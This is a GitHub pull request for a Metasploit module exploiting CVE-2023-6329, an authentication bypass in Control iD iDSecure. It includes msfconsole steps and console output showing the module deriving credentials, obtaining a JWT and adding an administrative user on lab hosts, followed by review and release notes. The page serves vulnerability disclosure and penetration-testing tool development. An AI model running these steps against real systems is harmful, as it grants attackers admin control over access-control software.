Control iD iDSecure Authentication Bypass (CVE-2023-6329) Module #19380

Merged: 4 commits merged on Aug 26, 2024

@h4x-x0r h4x-x0r commented Aug 11, 2024

This is a new module which exploits an improper access control vulnerability (CVE-2023-6329) in Control iD iDSecure <= v4.7.43.0. It allows an unauthenticated remote attacker to compute valid credentials and to add a new administrative user to the web interface of the product.

Verification Steps

  1. Download the application from the vendor.
  2. Deploy it by following the vendor's documentation.
  3. Start msfconsole
  4. use auxiliary/admin/http/idsecure_auth_bypass
  5. set RHOSTS <IP>
  6. run

A new administrative user should have been added to the web interface of the product.

msf6 > use auxiliary/admin/http/idsecure_auth_bypass
msf6 auxiliary(admin/http/idsecure_auth_bypass) > set RHOSTS 192.168.137.196
[*] Running module against 192.168.137.196

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version retrieved: 4.7.43.0
[+] The target appears to be vulnerable.
[+] Retrieved passwordRandom: <redacted>
[+] Retrieved serial: <redacted>
[*] Created passwordCustom: <redacted>
[+] Retrieved JWT accessToken: <redacted>
[+] New user 'h4x0r:Sup3rS3cr3t!' was successfully added.
[+] Login at: https://192.168.137.196:30443/#/login
[*] Auxiliary module execution completed

Successfully tested on

  • Control iD iDSecure v4.7.43.0 on Windows 10 22H2
  • Control iD iDSecure v4.7.32.0 on Windows 10 22H2

Control iD iDSecure Authentication Bypass (CVE-2023-6329) Module
added store_valid_credential
code cleanup
code cleanup
@h4x-x0r h4x-x0r marked this pull request as draft August 19, 2024 15:41
code cleanup
@h4x-x0r h4x-x0r marked this pull request as ready for review August 19, 2024 20:21
@bwatters-r7 bwatters-r7 self-assigned this Aug 23, 2024
@bwatters-r7

msf6 auxiliary(admin/http/idsecure_auth_bypass) > show options

Module options (auxiliary/admin/http/idsecure_auth_bypass):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   NEW_PASSWORD  6FnMHvrCm3Gr     yes       Password for the specified user
   NEW_USER      s8BFpy6b         yes       The new administrative user to add to the system
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                            metasploit.html
   RPORT         30443            yes       The target port (TCP)
   SSL           True             no        Negotiate SSL/TLS for outgoing connections
   VHOST                          no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/idsecure_auth_bypass) > set rhost 10.5.134.118
rhost => 10.5.134.118
msf6 auxiliary(admin/http/idsecure_auth_bypass) > run
[*] Running module against 10.5.134.118

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Got version: 4.7.43.0
[+] The target appears to be vulnerable.
[+] Retrieved passwordRandom: 2993036889
[+] Retrieved serial: GAD27523A4
[*] Created passwordCustom: 13441929
[+] Retrieved JWT: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjaWRVc2VyVHlwZSI6IjEiLCJjaWRVc2VyTmFtZSI6IkFkbWluaXN0cmFkb3IiLCJjaWRVc2VySWQiOiIxIiwiaXNzIjoiR2VyZW5jaWFkb3IgaURBY2Nlc3MiLCJleHAiOjE3MjQ3OTk2OTksIm5iZiI6MTcyNDcxMzI5OX0.KSI_2XxFdYV0hBo6LogwvKeNnfL9d-q3u9B2vJQ9niQ
[+] New user 's8BFpy6b:6FnMHvrCm3Gr' was successfully added.
[+] Login at: https://10.5.134.118:30443/#/login
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/idsecure_auth_bypass) > 

@bwatters-r7 bwatters-r7 merged commit 84431b0 into rapid7:master Aug 26, 2024
39 checks passed
@bwatters-r7

Release Notes

Adds an auxiliary module targeting CVE-2023-6329, an improper access control vulnerability, which allows an unauthenticated user to compute valid credentials and to add a new administrative user to the web interface of Control iD iDSecure <= v4.7.43.0.

@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 26, 2024